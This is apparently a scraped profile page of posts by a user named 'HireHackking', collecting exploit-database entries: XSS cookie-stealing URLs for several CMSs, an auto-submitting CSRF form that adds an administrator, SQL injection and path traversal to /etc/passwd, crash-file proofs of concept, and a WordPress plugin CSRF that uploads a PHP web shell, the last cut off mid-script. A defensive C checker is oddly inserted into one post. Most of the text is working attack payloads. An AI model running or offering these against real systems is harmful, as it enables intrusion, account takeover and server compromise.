HireHackking

Everything posted by HireHackking

  1. source: https://www.securityfocus.com/bid/52221/info

     Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

     An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

     Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected.

     http://www.example.com/admin/comments.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
     http://www.example.com/admin/comments.php?sortby=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
     http://www.example.com/admin/comments.php?order=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
     http://www.example.com/admin/comments.php?status=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
  2. source: https://www.securityfocus.com/bid/52236/info

     Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

     An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

     Fork CMS versions prior to 3.2.7 are vulnerable.

     http://www.example.com/private/en/locale/index?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
  3. source: https://www.securityfocus.com/bid/52221/info

     Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

     An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

     Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected.

     http://www.example.com/admin/plugin.php?p=tags&m=tag_posts&tag=[TAG]&page=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
  4. # source: https://www.securityfocus.com/bid/52224/info
     #
     # Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability.
     #
     # Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
     #
     # Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected.
     #

     <html>
     <body onload="javascript:document.forms[0].submit()">
     <p>by:thegreenhornet</p>
     <form method="POST" name="form0" action="http://www.example.com/top/admincp/main.php?op=add-admin">
     <input type="hidden" name="u_name" value="admin2"/>
     <input type="hidden" name="u_m_pass" value="123456"/>
     <input type="hidden" name="u_email" value="WW22@rwoot.com"/>
     </form>
     </body>
     </html>
  5. source: https://www.securityfocus.com/bid/52236/info

     Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

     An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

     Fork CMS versions prior to 3.2.7 are vulnerable.

     http://www.example.com/private/en/error?type=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
     http://www.example.com/private/en/error?type=action-not-allowed&querystring=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E.1
  6. source: https://www.securityfocus.com/bid/52262/info

     starCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

     An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

     http://www.example.com/index.php?q=[Xss]&r=5&lang=de&actionsuche=yes
  7. source: https://www.securityfocus.com/bid/52273/info

     Splash PRO is prone to a denial-of-service vulnerability.

     Attackers can exploit this issue to crash the affected application, denying service to legitimate users.

     Splash PRO 1.12.1 is vulnerable; other versions may also be affected.

     # Bytes literals so the script runs unchanged under Python 2 and 3
     PoC  = b"\x52\x49\x46\x46\x3c\xad\x08\x00\x41\x56\x49\x20\x4c\x49\x53\x54"  # "RIFF", chunk size, "AVI ", "LIST"
     PoC += b"\x72\x22\x00\x00\x68\x64\x72\x6c"                                  # LIST size, "hdrl"
     payload = PoC
     f = open("Crash.avi", "wb")
     f.write(payload)
     f.close()
  8. source: https://www.securityfocus.com/bid/52295/info

     Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

     An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

     Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected.

     http://www.example.com/etano/search.php?'";><script>alert(/XSS/)</script>
     http://www.example.com/etano/search.php?st='";><script>alert(/XSS/)</script>
     http://www.example.com/etano/search.php?f17_city='";><script>alert(/XSS/)</script>&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1
     http://www.example.com/etano/search.php?f17_city=0&f17_country='";><script>alert(/XSS/)</script>&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1
     http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state='";><script>alert(/XSS/)</script>&f17_zip=3&f19=0&st=basic&wphoto=1
     http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip='";><script>alert(/XSS/)</script>&f19=0&st=basic&wphoto=1
     http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19='";><script>alert(/XSS/)</script>&st=basic&wphoto=1
     http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st='";><script>alert(/XSS/)</script>&wphoto=1
     http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto='";><script>alert(/XSS/)</script>
     http://www.example.com/etano/search.php?search='";><script>alert(/XSS/)</script>&v=g
     http://www.example.com/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v='";><script>alert(/XSS/)</script>
     http://www.example.com/etano/search.php?st=xss";><script>alert(/XSS/)</script>&user=unknown
  9. source: https://www.securityfocus.com/bid/52293/info

     LastGuru ASP GuestBook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

     Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     http://www.example.com/victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='a
  10. source: https://www.securityfocus.com/bid/52295/info

      Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

      An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

      Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected.

      http://www.example.com/etano/photo_search.php?'";><script>alert(/XSS/)</script>
      http://www.example.com/etano/photo_search.php?st='";><script>alert(/XSS/)</script>
  11. source: https://www.securityfocus.com/bid/52295/info

      Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

      An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

      Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected.

      http://www.example.com/etano/photo_view.php?photo_id=1&return=";><script>alert(/XSS/)</script>
  12. Document Title:
      ===============
      Grindr 2.1.1 iOS Bug Bounty #2 - Denial of Service Software Vulnerability

      References (Source):
      ====================
      http://www.vulnerability-lab.com/get_content.php?id=1418

      Release Date:
      =============
      2015-05-02

      Vulnerability Laboratory ID (VL-ID):
      ====================================
      1418

      Common Vulnerability Scoring System:
      ====================================
      3.3

      Product & Service Introduction:
      ===============================
      Grindr, which first launched in 2009, has exploded into the largest and most popular all-male location-based social network out there. With more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app every day -- you'll always find a new date, buddy, or friend on Grindr. Grindr is a simple app that uses your mobile device's location-based services to show you the guys closest to you who are also on Grindr. How much of your info they see is entirely your call.

      (Copy of the Vendor Homepage: http://grindr.com/learn-more )

      Abstract Advisory Information:
      ==============================
      The Vulnerability Laboratory Research Team discovered a local and remote denial of service vulnerability in the official Grindr v2.1.1 iOS mobile web-application.

      Vulnerability Disclosure Timeline:
      ==================================
      2015-01-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security)
      2015-01-22: Vendor Notification (Grindr - Bug Bounty Program)
      2015-02-02: Vendor Response/Feedback (Grindr - Bug Bounty Program)
      2015-04-01: Vendor Fix/Patch (Grindr Developer Team - Reward: x & Manager: x)
      2015-05-04: Public Disclosure (Vulnerability Laboratory)

      Discovery Status:
      =================
      Published

      Affected Product(s):
      ====================
      Grindr LLC
      Product: Grindr - iOS Mobile Web Application (API) 2.2.1

      Exploitation Technique:
      =======================
      Remote

      Severity Level:
      ===============
      Medium

      Technical Details & Description:
      ================================
      A local and remote Denial of Service vulnerability has been discovered in the official Grindr v2.1.1 iOS mobile web-application.

      The attacker injects a script code tag or multiple termination strings (%00%20%00%20%00) into the Display Name input field of the Edit Profile module. After the injection the service stores the malicious values as DisplayName. After the injection a random user proceeds to click the contact information (facebook/twitter) in the profile. After that the victim wants to copy the link and an internal service corruption occurs that crashes the mobile app. The issue is locally and remotely exploitable.

      Vulnerable Module(s):
      [+] Edit Profile

      Vulnerable Parameter(s): (Input)
      [+] Display Name

      Affected Module(s):
      [+] Contact > Social Network > Copy Link

      Proof of Concept (PoC):
      =======================
      The denial of service web vulnerability can be exploited by remote attackers and local user accounts with low user interaction (click). To demonstrate the vulnerability or to reproduce the issue follow the provided information and steps below to continue.

      Manual steps to reproduce ...
      1. Open the grindr mobile application
      2. Inject a script code tag as Display Name or use the terminated String with empty values
      3. Save and click in the profile the contact button (exp. facebook)
      4. Click to the send button ahead and push the Copy Link function
      5. The app service is getting terminated with an uncaught exception because of an internal parsing error

      Note: To exploit the issue remotely the profile needs to be shared with another user and then the user only needs to push the social contact button the same way.

      PoC Video:

      Solution - Fix & Patch:
      =======================
      The first step is to prevent the issue by a secure restriction of the input. Attach your own exception handling next to the insert itself. The social network accounts that are linked do not allow special chars in the username. The Grindr iOS app and the Android app allow registering an account and inserting own scripts <html5> or null strings that corrupt the copy-link process with an error. After the restriction has been set in the code of both (api) the issue can no longer execute to shut down another user's account. Even if the execution of this issue is prevented, that is only a preventive measure. To fix the bug ... Connect for example an iOS device with the running app to Windows. Sync the process and reproduce the remote error and local error. Move to the iOS error folder that has been synced. Get the error, attach another debugger and so on ...

      Security Risk:
      ==============
      The security risk of the local and remote denial of service vulnerability in the copy link function that corrupts is estimated as medium.

      Credits & Authors:
      ==================
      Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

      Disclaimer & Information:
      =========================
      The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

      Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
      Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
      Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
      Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
      Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
      Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

      Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

      Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

      --
      VULNERABILITY LABORATORY - RESEARCH TEAM
      SERVICE: www.vulnerability-lab.com
      CONTACT: research@vulnerability-lab.com
      PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
  13. # Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC
      # Date: 2015-05-03
      # Exploit Author: beford
      # Vendor Homepage: http://xerces.apache.org/#xerces-c
      # Version: Versions prior to 3.1.2
      # Tested on: Ubuntu 15.04
      # CVE : CVE-2015-0252

      Apache Xerces-C XML Parser Crashes on Malformed Input

      I believe this to be the same issue that was reported on CVE-2015-0252, posting this in case anyone is interested in reproducing it.

      Original advisory: https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt

      $ printf "\xff\xfe\x00\x00\x3c" > file.xml
      $ DOMPrint ./file.xml   # Ubuntu 15.04 libxerces-c3.1 package
      Segmentation fault
      $ ./DOMPrint ./file.xml # ASAN Enabled build
      =================================================================
      ==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c at pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798
      READ of size 1 at 0xb5d9d87c thread T0
          #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer() xercesc/internal/XMLReader.cpp:1719
          #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*, unsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761
          #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer() xercesc/internal/XMLReader.cpp:576
          #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short const*) xercesc/internal/XMLReader.cpp:1223
          #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short const*) xercesc/internal/ReaderMgr.hpp:385
          #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool) xercesc/internal/XMLScanner.cpp:1608
          #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog() xercesc/internal/XMLScanner.cpp:1244
          #7 0x8d69220 in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:206
          #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400
          #9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408
          #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601
          #11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398
          #12 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d)
          #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5)

      0xb5d9d87c is located 0 bytes to the right of 163964-byte region [0xb5d75800,0xb5d9d87c)
      allocated by thread T0 here:
          #0 0xb72c3ae4 in operator new(unsigned int) (/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4)
          #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int) xercesc/internal/MemoryManagerImpl.cpp:40
          #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int, xercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68
          #3 0x8daaaa7 in xercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner2.cpp:1284
          #4 0x8d6912a in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:198
          #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400
          #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408
          #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601
          #8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398
          #9 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d)

      SUMMARY: AddressSanitizer: heap-buffer-overflow xercesc/internal/XMLReader.cpp:1719 xercesc_3_1::XMLReader::refreshRawBuffer()
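A defensive pre-parse check, added here as an example and not part of Xerces-C or of beford's post: it sniffs the byte-order mark of an XML byte stream and rejects input, such as the 5-byte file above, whose declared code-unit size does not divide the bytes that follow the mark. It assumes (the post does not state the root cause) that a UTF-32 BOM followed by less than one whole code unit is what drives the transcoder past its raw buffer.

```c
/* Pre-parse sanity check for XML byte streams handed to a native parser.
 * Added example for this thread; not Xerces-C code. Assumption, not confirmed
 * by the post: FF FE 00 00 3C is a UTF-32LE byte-order mark followed by a
 * single byte, i.e. less than one complete code unit, and the transcoder
 * then reads past the end of its raw buffer. A front-end can refuse such
 * input before the parser ever sees it. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

enum xml_enc { ENC_UNKNOWN = 0, ENC_UTF8, ENC_UTF16LE, ENC_UTF16BE,
               ENC_UTF32LE, ENC_UTF32BE };

struct bom_info {
    enum xml_enc enc;
    size_t bom_len;   /* bytes taken up by the byte-order mark, 0 if none */
    size_t unit_size; /* bytes per code unit in the declared encoding */
};

/* Classify the leading bytes. The 4-byte marks are tested first because
 * FF FE 00 00 (UTF-32LE) begins with the UTF-16LE mark FF FE, and
 * 00 00 FE FF (UTF-32BE) must not be read as plain NUL bytes. */
static struct bom_info sniff_bom(const uint8_t *buf, size_t len)
{
    struct bom_info bi = { ENC_UNKNOWN, 0, 1 };
    if (len >= 4 && buf[0] == 0xFF && buf[1] == 0xFE && buf[2] == 0x00 && buf[3] == 0x00) {
        bi.enc = ENC_UTF32LE; bi.bom_len = 4; bi.unit_size = 4;
    } else if (len >= 4 && buf[0] == 0x00 && buf[1] == 0x00 && buf[2] == 0xFE && buf[3] == 0xFF) {
        bi.enc = ENC_UTF32BE; bi.bom_len = 4; bi.unit_size = 4;
    } else if (len >= 2 && buf[0] == 0xFF && buf[1] == 0xFE) {
        bi.enc = ENC_UTF16LE; bi.bom_len = 2; bi.unit_size = 2;
    } else if (len >= 2 && buf[0] == 0xFE && buf[1] == 0xFF) {
        bi.enc = ENC_UTF16BE; bi.bom_len = 2; bi.unit_size = 2;
    } else if (len >= 3 && buf[0] == 0xEF && buf[1] == 0xBB && buf[2] == 0xBF) {
        bi.enc = ENC_UTF8; bi.bom_len = 3; bi.unit_size = 1;
    }
    return bi;
}

/* Returns 1 when the document may be handed to the parser and 0 when it
 * should be rejected: after the BOM there must be at least one complete
 * code unit, and the remaining length must be a whole number of units.
 * Only the first four bytes are inspected, so len may be the full file size. */
int xml_prefix_is_well_formed(const uint8_t *buf, size_t len)
{
    struct bom_info bi = sniff_bom(buf, len);
    size_t body = len - bi.bom_len;      /* bom_len <= len by construction */
    if (body < bi.unit_size) return 0;   /* BOM alone, or a truncated unit */
    if (body % bi.unit_size != 0) return 0;
    return 1;
}

/* Constructed samples (not taken from any real document). SAMPLE_POC is the
 * exact byte sequence the printf command in the post writes to file.xml. */
const uint8_t SAMPLE_POC[]       = { 0xFF, 0xFE, 0x00, 0x00, 0x3C };
const uint8_t SAMPLE_UTF32_OK[]  = { 0xFF, 0xFE, 0x00, 0x00,
                                     0x3C, 0x00, 0x00, 0x00,   /* '<' */
                                     0x61, 0x00, 0x00, 0x00,   /* 'a' */
                                     0x2F, 0x00, 0x00, 0x00,   /* '/' */
                                     0x3E, 0x00, 0x00, 0x00 }; /* '>' */
const uint8_t SAMPLE_UTF16_ODD[] = { 0xFF, 0xFE, 0x3C, 0x00, 0x61 };
const uint8_t SAMPLE_ASCII[]     = { '<', 'a', '/', '>' };
const uint8_t SAMPLE_BOM_ONLY[]  = { 0x00, 0x00, 0xFE, 0xFF };

/* Apply the check to a file: keeps the first four bytes, counts the rest.
 * Returns -1 on I/O error, otherwise the verdict of xml_prefix_is_well_formed. */
int check_file(const char *path)
{
    uint8_t head[4], scratch[4096];
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    size_t total = fread(head, 1, sizeof head, f);
    size_t n;
    while ((n = fread(scratch, 1, sizeof scratch, f)) > 0) total += n;
    fclose(f);
    return xml_prefix_is_well_formed(head, total);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s file.xml\n", argv[0]);
        return 2;
    }
    int v = check_file(argv[1]);
    if (v < 0) { perror(argv[1]); return 2; }
    printf("%s: %s\n", argv[1], v ? "passes prefix check" : "REJECTED (truncated code unit)");
    return v ? 0 : 1;
}
```

Run it against the file.xml produced above and it exits 1 before any parser is invoked; a well-formed UTF-32 document passes.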
  14. Document Title:
      ===============
      PhotoWebsite v3.1 iOS - File Include Web Vulnerability

      References (Source):
      ====================
      http://www.vulnerability-lab.com/get_content.php?id=1474

      Release Date:
      =============
      2015-05-04

      Vulnerability Laboratory ID (VL-ID):
      ====================================
      1476

      Common Vulnerability Scoring System:
      ====================================
      6.6

      Product & Service Introduction:
      ===============================
      Photo Website lets your Camera Roll become a website. The app lets the iphone/ipad become a website. It is a wifi network app, letting you access camera roll photos over your pc browser. Now sharing Camera Roll with your friend is a very simple event. Fast browsing of thumbnails.

      (https://itunes.apple.com/de/app/photo-website/id543436097)

      Abstract Advisory Information:
      ==============================
      The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official PhotoWebsite v3.1 iOS mobile web-application.

      Vulnerability Disclosure Timeline:
      ==================================
      2015-05-04: Public Disclosure (Vulnerability Laboratory)

      Discovery Status:
      =================
      Published

      Affected Product(s):
      ====================
      AirPhoto
      Product: PhotoWebsite - iOS Mobile Web Application 3.1

      Exploitation Technique:
      =======================
      Remote

      Severity Level:
      ===============
      High

      Technical Details & Description:
      ================================
      A local file include web vulnerability has been discovered in the official PhotoWebsite v3.1 iOS mobile web-application. The local file include web vulnerability allows remote attackers to include unauthorized local file/path requests or system specific path commands to compromise the mobile web-application.

      The web vulnerability is located in the `mDirNameList` and `mDirUrlList` values of the `airphotos.ma - upload` module. Remote attackers are able to inject own files with malicious `mDirNameList` values in the `upload.action` sync request to compromise the mobile web-application. The local file/path include execution occurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable upload service module. Remote attackers are also able to exploit the `mDirNameList` and `mDirUrlList` validation issue in combination with persistent injected script codes to execute unique local malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST (upload) or Sync (device). To exploit the bug it is required to use the local device > wifi sync or (remote) the wifi gui.

      The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application or device compromise.

      Request Method(s):
      [+] Sync

      Vulnerable Module(s):
      [+] upload

      Vulnerable File(s):
      [+] airphotos.ma

      Vulnerable Parameter(s):
      [+] mDirNameList
      [+] mDirUrlList

      Affected Module(s):
      [+] File Dir Index

      Proof of Concept (PoC):
      =======================
      The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

      PoC: airphotos.ma

      <script language="JavaScript" type="text/javascript">
      var mImgList =[];
      var mWidthList= [];
      var mHeightList= [];
      var mThumWidth=144
      var mDirNameList=["">[LOCAL FILE INCLUDE VULNERABILITY!]", "Camera Roll", "My Photo Stream", ];
      var mDirUrlList=["@%22%3E%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E%5C", "@Camera%20Roll%5C", "@My%20Photo%20Stream%5C", ];
      var mUserWH=true;;
      var mUseApShow=false;;
      </script>

      Reference(s):
      http://localhost:1860/airphotos.ma

      Solution - Fix & Patch:
      =======================
      The vulnerability can be patched by a secure parse and encode of the vulnerable `mDirNameList` and `mDirUrlList` values. Restrict the input for folder and album names on sync and disallow special chars. Encode the file dir index list that shows the malicious context without secure parse to prevent further file include or request injection attacks.

      Security Risk:
      ==============
      The security risk of the local file include web vulnerability in the photowebsite wifi app is estimated as high. (CVSS 6.6)

      Credits & Authors:
      ==================
      Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
  15. source: https://www.securityfocus.com/bid/52296/info

      Open Realty is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

      An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

      Open Realty version 2.5.8 is vulnerable; other versions may also be affected.

      http://www.example.com/open-realty2.5.8/?select_users_template=../../../../../../../../../../../../../../../etc/passwd%00
  16. # Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate Product Catalogue 3.1.2
      # Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
      # Date: 22/04/2015
      # Exploit Author: Felipe Molina de la Torre (@felmoltor)
      # Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
      # Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
      # Version: <= 3.1.2, Communicated and Fixed by the Vendor in 3.1.5
      # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
      # CVE : N/A
      # Category: webapps

      1. Summary:

      Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +63.000 downloads, +4.000 active installations.

      The Product Name and Description and File Upload form of the plugin Ultimate Product Catalog lacks proper CSRF protection and proper filtering, allowing an attacker to alter a product presented to a customer or the wordpress administrators and insert XSS in its product name and description. It also allows an attacker to upload a php script through a CSRF due to a lack of file type filtering when uploading it.

      2. Vulnerability timeline:

      - 22/04/2015: Identified in version 3.1.2
      - 22/04/2015: Communicated to developer company etoilewebdesign.com
      - 22/04/2015: Response from etoilewebdesign.com and fixed two SQLi in 3.1.3 but not these vulnerabilities.
      - 28/04/2015: Fixed version in 3.1.5 without notifying me.

      3. Vulnerable code:

      In file html/ProductPage multiple lines.

      4. Proof of concept:

      https://www.youtube.com/watch?v=roB_ken6U4o

      ----------------------------------------------------------------------------------------------
      ------------- CSRF & XSS in Product Description and Name -----------
      ----------------------------------------------------------------------------------------------

      <iframe width=0 height=0 style="display:none" name="csrf-frame"></iframe>
      <form method='POST' action='http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16' target="csrf-frame" id="csrf-form">
        <input type='hidden' name='action' value='Edit_Product'>
        <input type='hidden' name='_wp_http_referer' value='/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'/>
        <input type='hidden' name='Item_Name' value="Product name</a><script>alert('Product Name says: '+document.cookie)</script><a>"/>
        <input type='hidden' name='Item_Slug' value='asdf'/>
        <input type='hidden' name='Item_ID' value='16'/>
        <input type='hidden' name='Item_Image' value='http://i.imgur.com/6cWKujq.gif'>
        <input type='hidden' name='Item_Price' value='666'>
        <input type='hidden' name='Item_Description' value="Product description says<script>alert('Product description says: '+document.cookie)</script>"/>
        <input type='hidden' name='Item_SEO_Description' value='seo desc'>
        <input type='hidden' name='Item_Link' value=''>
        <input type='hidden' name='Item_Display_Status' value='Show'>
        <input type='hidden' name='Category_ID' value=''>
        <input type='hidden' name='SubCategory_ID' value=''>
        <input style="display:none" type='submit' value='submit'>
      </form>
      <script>document.getElementById("csrf-form").submit()</script>

      ----------------------------------------------------------------------------------------------
      -------- CSRF & File Upload in Product Description and Name ------
      ----------------------------------------------------------------------------------------------

      <html>
      <body onload="submitRequest();">
      <script>
      function submitRequest() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product", true);
        xhr.setRequestHeader("Host", "<web>");
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
        xhr.setRequestHeader("Cache-Control", "max-age=0");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8,es;q=0.6");
        xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36");
        xhr.setRequestHeader("Accept-Encoding", "gzip, deflate");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundarylPTZvbxAcw0q01W3");
        var body = "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
          "Content-Disposition: form-data; name=\"Products_Spreadsheet\"; filename=\"cooldog.php\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "<?php\r\n" +
          "exec($_GET['c'],$output);\r\n" +
          "foreach ($output as $line) {\r\n" +
          "echo \"<br/>\".$line;\r\n" +
          "}\r\n" +
          "?>\r\n" +
          "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
          "Content-Disposition: form-data; name='submit'\r\n" +
          "\r\n" +
          "Add New Products\r\n" +
          "------WebKitFormBoundarylPTZvbxAcw0q01W3--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
